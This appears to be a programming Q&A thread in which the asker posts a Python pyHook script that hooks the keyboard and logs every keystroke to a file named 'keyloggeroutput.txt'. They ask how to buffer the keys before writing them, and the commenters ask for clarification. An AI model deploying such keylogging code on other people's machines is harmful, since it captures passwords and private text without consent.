# Hi, how to catch and parse letter from stream

Tags: python

how i can catch and parse message in json, i mean letters (keys),
i mean append message in variable and append this variable to file, after it clear variable.

```
import pyHook, pythoncom, sys, logging

file_log = 'keyloggeroutput.txt'

def OnKeyboardEvent(event):
    logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
    logging.log(10, chr(event.Ascii))
    print(5)
    return True


hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
```

Comment: Can you show the sample of the file?

Comment: witch file?

keyloggeroutput.txt show this verticale
 
a
s
f
s
f
s
a
w
d
a
f
a
s
f
a
w
f
w
a
f
a
f
w
a


r
o

i
n
t
 

 

 


 
p
r
i
n
t
 
 
(
5
 
)
 

 





 

 
a
a
s
f
a
s
f
a
s
f
a
a
s
f
a
s
f
a
w
q
f
s
f

Comment: i mean letter \r

Comment: print is not show nothing

Comment: What you want to achieve is not clear..either add more core or expected output.